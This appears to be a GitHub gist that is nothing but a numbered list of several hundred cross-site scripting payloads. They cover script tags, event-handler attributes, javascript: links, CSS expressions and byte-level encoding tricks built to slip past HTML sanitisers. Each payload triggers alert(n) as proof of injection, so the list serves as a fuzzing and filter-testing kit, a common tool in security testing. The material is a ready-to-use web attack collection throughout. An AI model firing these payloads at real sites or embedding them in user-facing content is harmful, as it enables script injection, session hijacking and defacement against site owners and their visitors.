Created
September 25, 2019 13:55
-
-
Save iklobato/eeb865ff330c675289a48b640fc85b0e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(2);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(3);</script> | |
| <script\x09type="text/javascript">javascript:alert(4);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(5);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(6);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(7);</script> | |
| '`"><\x3Cscript>javascript:alert(8)</script> | |
| '`"><\x00script>javascript:alert(9)</script> | |
| <img src=1 href=1 onerror="javascript:alert(10)"></img> | |
| <audio src=1 href=1 onerror="javascript:alert(11)"></audio> | |
| <video src=1 href=1 onerror="javascript:alert(12)"></video> | |
| <body src=1 href=1 onerror="javascript:alert(13)"></body> | |
| <image src=1 href=1 onerror="javascript:alert(14)"></image> | |
| <object src=1 href=1 onerror="javascript:alert(15)"></object> | |
| <script src=1 href=1 onerror="javascript:alert(16)"></script> | |
| <svg onResize svg onResize="javascript:javascript:alert(17)"></svg onResize> | |
| <title onPropertyChange title onPropertyChange="javascript:javascript:alert(18)"></title onPropertyChange> | |
| <iframe onLoad iframe onLoad="javascript:javascript:alert(19)"></iframe onLoad> | |
| <body onMouseEnter body onMouseEnter="javascript:javascript:alert(20)"></body onMouseEnter> | |
| <body onFocus body onFocus="javascript:javascript:alert(21)"></body onFocus> | |
| <frameset onScroll frameset onScroll="javascript:javascript:alert(22)"></frameset onScroll> | |
| <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(23)"></script onReadyStateChange> | |
| <html onMouseUp html onMouseUp="javascript:javascript:alert(24)"></html onMouseUp> | |
| <body onPropertyChange body onPropertyChange="javascript:javascript:alert(25)"></body onPropertyChange> | |
| <svg onLoad svg onLoad="javascript:javascript:alert(26)"></svg onLoad> | |
| <body onPageHide body onPageHide="javascript:javascript:alert(27)"></body onPageHide> | |
| <body onMouseOver body onMouseOver="javascript:javascript:alert(28)"></body onMouseOver> | |
| <body onUnload body onUnload="javascript:javascript:alert(29)"></body onUnload> | |
| <body onLoad body onLoad="javascript:javascript:alert(30)"></body onLoad> | |
| <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(31)"></bgsound onPropertyChange> | |
| <html onMouseLeave html onMouseLeave="javascript:javascript:alert(32)"></html onMouseLeave> | |
| <html onMouseWheel html onMouseWheel="javascript:javascript:alert(33)"></html onMouseWheel> | |
| <style onLoad style onLoad="javascript:javascript:alert(34)"></style onLoad> | |
| <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(35)"></iframe onReadyStateChange> | |
| <body onPageShow body onPageShow="javascript:javascript:alert(36)"></body onPageShow> | |
| <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(37)"></style onReadyStateChange> | |
| <frameset onFocus frameset onFocus="javascript:javascript:alert(38)"></frameset onFocus> | |
| <applet onError applet onError="javascript:javascript:alert(39)"></applet onError> | |
| <marquee onStart marquee onStart="javascript:javascript:alert(40)"></marquee onStart> | |
| <script onLoad script onLoad="javascript:javascript:alert(41)"></script onLoad> | |
| <html onMouseOver html onMouseOver="javascript:javascript:alert(42)"></html onMouseOver> | |
| <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(43)"></html onMouseEnter> | |
| <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(44)"></body onBeforeUnload> | |
| <html onMouseDown html onMouseDown="javascript:javascript:alert(45)"></html onMouseDown> | |
| <marquee onScroll marquee onScroll="javascript:javascript:alert(46)"></marquee onScroll> | |
| <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(47)"></xml onPropertyChange> | |
| <frameset onBlur frameset onBlur="javascript:javascript:alert(48)"></frameset onBlur> | |
| <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(49)"></applet onReadyStateChange> | |
| <svg onUnload svg onUnload="javascript:javascript:alert(50)"></svg onUnload> | |
| <html onMouseOut html onMouseOut="javascript:javascript:alert(51)"></html onMouseOut> | |
| <body onMouseMove body onMouseMove="javascript:javascript:alert(52)"></body onMouseMove> | |
| <body onResize body onResize="javascript:javascript:alert(53)"></body onResize> | |
| <object onError object onError="javascript:javascript:alert(54)"></object onError> | |
| <body onPopState body onPopState="javascript:javascript:alert(55)"></body onPopState> | |
| <html onMouseMove html onMouseMove="javascript:javascript:alert(56)"></html onMouseMove> | |
| <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(57)"></applet onreadystatechange> | |
| <body onpagehide body onpagehide="javascript:javascript:alert(58)"></body onpagehide> | |
| <svg onunload svg onunload="javascript:javascript:alert(59)"></svg onunload> | |
| <applet onerror applet onerror="javascript:javascript:alert(60)"></applet onerror> | |
| <body onkeyup body onkeyup="javascript:javascript:alert(61)"></body onkeyup> | |
| <body onunload body onunload="javascript:javascript:alert(62)"></body onunload> | |
| <iframe onload iframe onload="javascript:javascript:alert(63)"></iframe onload> | |
| <body onload body onload="javascript:javascript:alert(64)"></body onload> | |
| <html onmouseover html onmouseover="javascript:javascript:alert(65)"></html onmouseover> | |
| <object onbeforeload object onbeforeload="javascript:javascript:alert(66)"></object onbeforeload> | |
| <body onbeforeunload body onbeforeunload="javascript:javascript:alert(67)"></body onbeforeunload> | |
| <body onfocus body onfocus="javascript:javascript:alert(68)"></body onfocus> | |
| <body onkeydown body onkeydown="javascript:javascript:alert(69)"></body onkeydown> | |
| <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(70)"></iframe onbeforeload> | |
| <iframe src iframe src="javascript:javascript:alert(71)"></iframe src> | |
| <svg onload svg onload="javascript:javascript:alert(72)"></svg onload> | |
| <html onmousemove html onmousemove="javascript:javascript:alert(73)"></html onmousemove> | |
| <body onblur body onblur="javascript:javascript:alert(74)"></body onblur> | |
| \x3Cscript>javascript:alert(75)</script> | |
| '"`><script>/* *\x2Fjavascript:alert(76)// */</script> | |
| <script>javascript:alert(77)</script\x0D | |
| <script>javascript:alert(78)</script\x0A | |
| <script>javascript:alert(79)</script\x0B | |
| <script charset="\x22>javascript:alert(80)</script> | |
| <!--\x3E<img src=xxx:x onerror=javascript:alert(81)> --> | |
| --><!-- ---> <img src=xxx:x onerror=javascript:alert(82)> --> | |
| --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(83)> --> | |
| --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(84)> --> | |
| --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(85)> --> | |
| `"'><img src='#\x27 onerror=javascript:alert(86)> | |
| <a href="javascript\x3Ajavascript:alert(87)" id="fuzzelement1">test</a> | |
| "'`><p><svg><script>a='hello\x27;javascript:alert(88)//';</script></p> | |
| <a href="javas\x00cript:javascript:alert(89)" id="fuzzelement1">test</a> | |
| <a href="javas\x07cript:javascript:alert(90)" id="fuzzelement1">test</a> | |
| <a href="javas\x0Dcript:javascript:alert(91)" id="fuzzelement1">test</a> | |
| <a href="javas\x0Acript:javascript:alert(92)" id="fuzzelement1">test</a> | |
| <a href="javas\x08cript:javascript:alert(93)" id="fuzzelement1">test</a> | |
| <a href="javas\x02cript:javascript:alert(94)" id="fuzzelement1">test</a> | |
| <a href="javas\x03cript:javascript:alert(95)" id="fuzzelement1">test</a> | |
| <a href="javas\x04cript:javascript:alert(96)" id="fuzzelement1">test</a> | |
| <a href="javas\x01cript:javascript:alert(97)" id="fuzzelement1">test</a> | |
| <a href="javas\x05cript:javascript:alert(98)" id="fuzzelement1">test</a> | |
| <a href="javas\x0Bcript:javascript:alert(99)" id="fuzzelement1">test</a> | |
| <a href="javas\x09cript:javascript:alert(100)" id="fuzzelement1">test</a> | |
| <a href="javas\x06cript:javascript:alert(101)" id="fuzzelement1">test</a> | |
| <a href="javas\x0Ccript:javascript:alert(102)" id="fuzzelement1">test</a> | |
| <script>/* *\x2A/javascript:alert(103)// */</script> | |
| <script>/* *\x00/javascript:alert(104)// */</script> | |
| <style></style\x3E<img src="about:blank" onerror=javascript:alert(105)//></style> | |
| <style></style\x0D<img src="about:blank" onerror=javascript:alert(106)//></style> | |
| <style></style\x09<img src="about:blank" onerror=javascript:alert(107)//></style> | |
| <style></style\x20<img src="about:blank" onerror=javascript:alert(108)//></style> | |
| <style></style\x0A<img src="about:blank" onerror=javascript:alert(109)//></style> | |
| "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(110);/*';">DEF | |
| "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(111);/*';">DEF | |
| <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(112);}</script> | |
| <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(113);}</script> | |
| <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(114);}</script> | |
| '`"><\x3Cscript>javascript:alert(115)</script> | |
| '`"><\x00script>javascript:alert(116)</script> | |
| "'`><\x3Cimg src=xxx:x onerror=javascript:alert(117)> | |
| "'`><\x00img src=xxx:x onerror=javascript:alert(118)> | |
| <script src="data:text/plain\x2Cjavascript:alert(119)"></script> | |
| <script src="data:\xD4\x8F,javascript:alert(120)"></script> | |
| <script src="data:\xE0\xA4\x98,javascript:alert(121)"></script> | |
| <script src="data:\xCB\x8F,javascript:alert(122)"></script> | |
| <script\x20type="text/javascript">javascript:alert(123);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(124);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(125);</script> | |
| <script\x09type="text/javascript">javascript:alert(126);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(127);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(128);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(129);</script> | |
| ABC<div style="x\x3Aexpression(javascript:alert(130)">DEF | |
| ABC<div style="x:expression\x5C(javascript:alert(131)">DEF | |
| ABC<div style="x:expression\x00(javascript:alert(132)">DEF | |
| ABC<div style="x:exp\x00ression(javascript:alert(133)">DEF | |
| ABC<div style="x:exp\x5Cression(javascript:alert(134)">DEF | |
| ABC<div style="x:\x0Aexpression(javascript:alert(135)">DEF | |
| ABC<div style="x:\x09expression(javascript:alert(136)">DEF | |
| ABC<div style="x:\xE3\x80\x80expression(javascript:alert(137)">DEF | |
| ABC<div style="x:\xE2\x80\x84expression(javascript:alert(138)">DEF | |
| ABC<div style="x:\xC2\xA0expression(javascript:alert(139)">DEF | |
| ABC<div style="x:\xE2\x80\x80expression(javascript:alert(140)">DEF | |
| ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(141)">DEF | |
| ABC<div style="x:\x0Dexpression(javascript:alert(142)">DEF | |
| ABC<div style="x:\x0Cexpression(javascript:alert(143)">DEF | |
| ABC<div style="x:\xE2\x80\x87expression(javascript:alert(144)">DEF | |
| ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(145)">DEF | |
| ABC<div style="x:\x20expression(javascript:alert(146)">DEF | |
| ABC<div style="x:\xE2\x80\x88expression(javascript:alert(147)">DEF | |
| ABC<div style="x:\x00expression(javascript:alert(148)">DEF | |
| ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(149)">DEF | |
| ABC<div style="x:\xE2\x80\x86expression(javascript:alert(150)">DEF | |
| ABC<div style="x:\xE2\x80\x85expression(javascript:alert(151)">DEF | |
| ABC<div style="x:\xE2\x80\x82expression(javascript:alert(152)">DEF | |
| ABC<div style="x:\x0Bexpression(javascript:alert(153)">DEF | |
| ABC<div style="x:\xE2\x80\x81expression(javascript:alert(154)">DEF | |
| ABC<div style="x:\xE2\x80\x83expression(javascript:alert(155)">DEF | |
| ABC<div style="x:\xE2\x80\x89expression(javascript:alert(156)">DEF | |
| <a href="\x0Bjavascript:javascript:alert(157)" id="fuzzelement1">test</a> | |
| <a href="\x0Fjavascript:javascript:alert(158)" id="fuzzelement1">test</a> | |
| <a href="\xC2\xA0javascript:javascript:alert(159)" id="fuzzelement1">test</a> | |
| <a href="\x05javascript:javascript:alert(160)" id="fuzzelement1">test</a> | |
| <a href="\xE1\xA0\x8Ejavascript:javascript:alert(161)" id="fuzzelement1">test</a> | |
| <a href="\x18javascript:javascript:alert(162)" id="fuzzelement1">test</a> | |
| <a href="\x11javascript:javascript:alert(163)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\x88javascript:javascript:alert(164)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\x89javascript:javascript:alert(165)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\x80javascript:javascript:alert(166)" id="fuzzelement1">test</a> | |
| <a href="\x17javascript:javascript:alert(167)" id="fuzzelement1">test</a> | |
| <a href="\x03javascript:javascript:alert(168)" id="fuzzelement1">test</a> | |
| <a href="\x0Ejavascript:javascript:alert(169)" id="fuzzelement1">test</a> | |
| <a href="\x1Ajavascript:javascript:alert(170)" id="fuzzelement1">test</a> | |
| <a href="\x00javascript:javascript:alert(171)" id="fuzzelement1">test</a> | |
| <a href="\x10javascript:javascript:alert(172)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\x82javascript:javascript:alert(173)" id="fuzzelement1">test</a> | |
| <a href="\x20javascript:javascript:alert(174)" id="fuzzelement1">test</a> | |
| <a href="\x13javascript:javascript:alert(175)" id="fuzzelement1">test</a> | |
| <a href="\x09javascript:javascript:alert(176)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\x8Ajavascript:javascript:alert(177)" id="fuzzelement1">test</a> | |
| <a href="\x14javascript:javascript:alert(178)" id="fuzzelement1">test</a> | |
| <a href="\x19javascript:javascript:alert(179)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\xAFjavascript:javascript:alert(180)" id="fuzzelement1">test</a> | |
| <a href="\x1Fjavascript:javascript:alert(181)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\x81javascript:javascript:alert(182)" id="fuzzelement1">test</a> | |
| <a href="\x1Djavascript:javascript:alert(183)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\x87javascript:javascript:alert(184)" id="fuzzelement1">test</a> | |
| <a href="\x07javascript:javascript:alert(185)" id="fuzzelement1">test</a> | |
| <a href="\xE1\x9A\x80javascript:javascript:alert(186)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\x83javascript:javascript:alert(187)" id="fuzzelement1">test</a> | |
| <a href="\x04javascript:javascript:alert(188)" id="fuzzelement1">test</a> | |
| <a href="\x01javascript:javascript:alert(189)" id="fuzzelement1">test</a> | |
| <a href="\x08javascript:javascript:alert(190)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\x84javascript:javascript:alert(191)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\x86javascript:javascript:alert(192)" id="fuzzelement1">test</a> | |
| <a href="\xE3\x80\x80javascript:javascript:alert(193)" id="fuzzelement1">test</a> | |
| <a href="\x12javascript:javascript:alert(194)" id="fuzzelement1">test</a> | |
| <a href="\x0Djavascript:javascript:alert(195)" id="fuzzelement1">test</a> | |
| <a href="\x0Ajavascript:javascript:alert(196)" id="fuzzelement1">test</a> | |
| <a href="\x0Cjavascript:javascript:alert(197)" id="fuzzelement1">test</a> | |
| <a href="\x15javascript:javascript:alert(198)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\xA8javascript:javascript:alert(199)" id="fuzzelement1">test</a> | |
| <a href="\x16javascript:javascript:alert(200)" id="fuzzelement1">test</a> | |
| <a href="\x02javascript:javascript:alert(201)" id="fuzzelement1">test</a> | |
| <a href="\x1Bjavascript:javascript:alert(202)" id="fuzzelement1">test</a> | |
| <a href="\x06javascript:javascript:alert(203)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\xA9javascript:javascript:alert(204)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x80\x85javascript:javascript:alert(205)" id="fuzzelement1">test</a> | |
| <a href="\x1Ejavascript:javascript:alert(206)" id="fuzzelement1">test</a> | |
| <a href="\xE2\x81\x9Fjavascript:javascript:alert(207)" id="fuzzelement1">test</a> | |
| <a href="\x1Cjavascript:javascript:alert(208)" id="fuzzelement1">test</a> | |
| <a href="javascript\x00:javascript:alert(209)" id="fuzzelement1">test</a> | |
| <a href="javascript\x3A:javascript:alert(210)" id="fuzzelement1">test</a> | |
| <a href="javascript\x09:javascript:alert(211)" id="fuzzelement1">test</a> | |
| <a href="javascript\x0D:javascript:alert(212)" id="fuzzelement1">test</a> | |
| <a href="javascript\x0A:javascript:alert(213)" id="fuzzelement1">test</a> | |
| `"'><img src=xxx:x \x0Aonerror=javascript:alert(214)> | |
| `"'><img src=xxx:x \x22onerror=javascript:alert(215)> | |
| `"'><img src=xxx:x \x0Bonerror=javascript:alert(216)> | |
| `"'><img src=xxx:x \x0Donerror=javascript:alert(217)> | |
| `"'><img src=xxx:x \x2Fonerror=javascript:alert(218)> | |
| `"'><img src=xxx:x \x09onerror=javascript:alert(219)> | |
| `"'><img src=xxx:x \x0Conerror=javascript:alert(220)> | |
| `"'><img src=xxx:x \x00onerror=javascript:alert(221)> | |
| `"'><img src=xxx:x \x27onerror=javascript:alert(222)> | |
| `"'><img src=xxx:x \x20onerror=javascript:alert(223)> | |
| "`'><script>\x3Bjavascript:alert(224)</script> | |
| "`'><script>\x0Djavascript:alert(225)</script> | |
| "`'><script>\xEF\xBB\xBFjavascript:alert(226)</script> | |
| "`'><script>\xE2\x80\x81javascript:alert(227)</script> | |
| "`'><script>\xE2\x80\x84javascript:alert(228)</script> | |
| "`'><script>\xE3\x80\x80javascript:alert(229)</script> | |
| "`'><script>\x09javascript:alert(230)</script> | |
| "`'><script>\xE2\x80\x89javascript:alert(231)</script> | |
| "`'><script>\xE2\x80\x85javascript:alert(232)</script> | |
| "`'><script>\xE2\x80\x88javascript:alert(233)</script> | |
| "`'><script>\x00javascript:alert(234)</script> | |
| "`'><script>\xE2\x80\xA8javascript:alert(235)</script> | |
| "`'><script>\xE2\x80\x8Ajavascript:alert(236)</script> | |
| "`'><script>\xE1\x9A\x80javascript:alert(237)</script> | |
| "`'><script>\x0Cjavascript:alert(238)</script> | |
| "`'><script>\x2Bjavascript:alert(239)</script> | |
| "`'><script>\xF0\x90\x96\x9Ajavascript:alert(240)</script> | |
| "`'><script>-javascript:alert(241)</script> | |
| "`'><script>\x0Ajavascript:alert(242)</script> | |
| "`'><script>\xE2\x80\xAFjavascript:alert(243)</script> | |
| "`'><script>\x7Ejavascript:alert(244)</script> | |
| "`'><script>\xE2\x80\x87javascript:alert(245)</script> | |
| "`'><script>\xE2\x81\x9Fjavascript:alert(246)</script> | |
| "`'><script>\xE2\x80\xA9javascript:alert(247)</script> | |
| "`'><script>\xC2\x85javascript:alert(248)</script> | |
| "`'><script>\xEF\xBF\xAEjavascript:alert(249)</script> | |
| "`'><script>\xE2\x80\x83javascript:alert(250)</script> | |
| "`'><script>\xE2\x80\x8Bjavascript:alert(251)</script> | |
| "`'><script>\xEF\xBF\xBEjavascript:alert(252)</script> | |
| "`'><script>\xE2\x80\x80javascript:alert(253)</script> | |
| "`'><script>\x21javascript:alert(254)</script> | |
| "`'><script>\xE2\x80\x82javascript:alert(255)</script> | |
| "`'><script>\xE2\x80\x86javascript:alert(256)</script> | |
| "`'><script>\xE1\xA0\x8Ejavascript:alert(257)</script> | |
| "`'><script>\x0Bjavascript:alert(258)</script> | |
| "`'><script>\x20javascript:alert(259)</script> | |
| "`'><script>\xC2\xA0javascript:alert(260)</script> | |
| "/><img/onerror=\x0Bjavascript:alert(261)\x0Bsrc=xxx:x /> | |
| "/><img/onerror=\x22javascript:alert(262)\x22src=xxx:x /> | |
| "/><img/onerror=\x09javascript:alert(263)\x09src=xxx:x /> | |
| "/><img/onerror=\x27javascript:alert(264)\x27src=xxx:x /> | |
| "/><img/onerror=\x0Ajavascript:alert(265)\x0Asrc=xxx:x /> | |
| "/><img/onerror=\x0Cjavascript:alert(266)\x0Csrc=xxx:x /> | |
| "/><img/onerror=\x0Djavascript:alert(267)\x0Dsrc=xxx:x /> | |
| "/><img/onerror=\x60javascript:alert(268)\x60src=xxx:x /> | |
| "/><img/onerror=\x20javascript:alert(269)\x20src=xxx:x /> | |
| <script\x2F>javascript:alert(270)</script> | |
| <script\x20>javascript:alert(271)</script> | |
| <script\x0D>javascript:alert(272)</script> | |
| <script\x0A>javascript:alert(273)</script> | |
| <script\x0C>javascript:alert(274)</script> | |
| <script\x00>javascript:alert(275)</script> | |
| <script\x09>javascript:alert(276)</script> | |
| `"'><img src=xxx:x onerror\x0B=javascript:alert(277)> | |
| `"'><img src=xxx:x onerror\x00=javascript:alert(278)> | |
| `"'><img src=xxx:x onerror\x0C=javascript:alert(279)> | |
| `"'><img src=xxx:x onerror\x0D=javascript:alert(280)> | |
| `"'><img src=xxx:x onerror\x20=javascript:alert(281)> | |
| `"'><img src=xxx:x onerror\x0A=javascript:alert(282)> | |
| `"'><img src=xxx:x onerror\x09=javascript:alert(283)> | |
| <script>javascript:alert(284)<\x00/script> | |
| <img src=# onerror\x3D"javascript:alert(285)" > | |
| <input onfocus=javascript:alert(286) autofocus> | |
| <input onblur=javascript:alert(287) autofocus><input autofocus> | |
| <video poster=javascript:javascript:alert(288)// | |
| <body onscroll=javascript:alert(289)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> | |
| <form id=test onforminput=javascript:alert(290)><input></form><button form=test onformchange=javascript:alert(291)>X | |
| <video><source onerror="javascript:javascript:alert(292)"> | |
| <video onerror="javascript:javascript:alert(293)"><source> | |
| <form><button formaction="javascript:javascript:alert(294)">X | |
| <body oninput=javascript:alert(295)><input autofocus> | |
| <math href="javascript:javascript:alert(296)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(297)">CLICKME</maction> </math> | |
| <frameset onload=javascript:alert(298)> | |
| <table background="javascript:javascript:alert(299)"> | |
| <!--<img src="--><img src=x onerror=javascript:alert(300)//"> | |
| <comment><img src="</comment><img src=x onerror=javascript:alert(301))//"> | |
| <![><img src="]><img src=x onerror=javascript:alert(302)//"> | |
| <style><img src="</style><img src=x onerror=javascript:alert(303)//"> | |
| <li style=list-style:url() onerror=javascript:alert(304)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(305)></div> | |
| <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(306)//#">XXX</a></body> | |
| <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(307)</SCRIPT> | |
| <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(308)"></OBJECT> | |
| <object data="data:text/html;base64,%(base64)s"> | |
| <embed src="data:text/html;base64,%(base64)s"> | |
| <b <script>alert(309)</script>0 | |
| <div id="div1"><input value="``onmouseover=javascript:alert(310)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> | |
| <x '="foo"><x foo='><img src=x onerror=javascript:alert(311)//'> | |
| <embed src="javascript:alert(312)"> | |
| <img src="javascript:alert(313)"> | |
| <image src="javascript:alert(314)"> | |
| <script src="javascript:alert(315)"> | |
| <div style=width:1px;filter:glow onfilterchange=javascript:alert(316)>x | |
| <? foo="><script>javascript:alert(317)</script>"> | |
| <! foo="><script>javascript:alert(318)</script>"> | |
| </ foo="><script>javascript:alert(319)</script>"> | |
| <? foo="><x foo='?><script>javascript:alert(320)</script>'>"> | |
| <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(321)</script>"> | |
| <% foo><x foo="%><script>javascript:alert(322)</script>"> | |
| <div id=d><x xmlns="><iframe onload=javascript:alert(323)"></div> <script>d.innerHTML=d.innerHTML</script> | |
| <img \x00src=x onerror="alert(324)"> | |
| <img \x47src=x onerror="javascript:alert(325)"> | |
| <img \x11src=x onerror="javascript:alert(326)"> | |
| <img \x12src=x onerror="javascript:alert(327)"> | |
| <img\x47src=x onerror="javascript:alert(328)"> | |
| <img\x10src=x onerror="javascript:alert(329)"> | |
| <img\x13src=x onerror="javascript:alert(330)"> | |
| <img\x32src=x onerror="javascript:alert(331)"> | |
| <img\x47src=x onerror="javascript:alert(332)"> | |
| <img\x11src=x onerror="javascript:alert(333)"> | |
| <img \x47src=x onerror="javascript:alert(334)"> | |
| <img \x34src=x onerror="javascript:alert(335)"> | |
| <img \x39src=x onerror="javascript:alert(336)"> | |
| <img \x00src=x onerror="javascript:alert(337)"> | |
| <img src\x09=x onerror="javascript:alert(338)"> | |
| <img src\x10=x onerror="javascript:alert(339)"> | |
| <img src\x13=x onerror="javascript:alert(340)"> | |
| <img src\x32=x onerror="javascript:alert(341)"> | |
| <img src\x12=x onerror="javascript:alert(342)"> | |
| <img src\x11=x onerror="javascript:alert(343)"> | |
| <img src\x00=x onerror="javascript:alert(344)"> | |
| <img src\x47=x onerror="javascript:alert(345)"> | |
| <img src=x\x09onerror="javascript:alert(346)"> | |
| <img src=x\x10onerror="javascript:alert(347)"> | |
| <img src=x\x11onerror="javascript:alert(348)"> | |
| <img src=x\x12onerror="javascript:alert(349)"> | |
| <img src=x\x13onerror="javascript:alert(350)"> | |
| <img[a][b][c]src[d]=x[e]onerror=[f]"alert(351)"> | |
| <img src=x onerror=\x09"javascript:alert(352)"> | |
| <img src=x onerror=\x10"javascript:alert(353)"> | |
| <img src=x onerror=\x11"javascript:alert(354)"> | |
| <img src=x onerror=\x12"javascript:alert(355)"> | |
| <img src=x onerror=\x32"javascript:alert(356)"> | |
| <img src=x onerror=\x00"javascript:alert(357)"> | |
| <a href=javascript:javascript:alert(358)>XXX</a> | |
| <img src="x` `<script>javascript:alert(359)</script>"` `> | |
| <img src onerror /" '"= alt=javascript:alert(360)//"> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment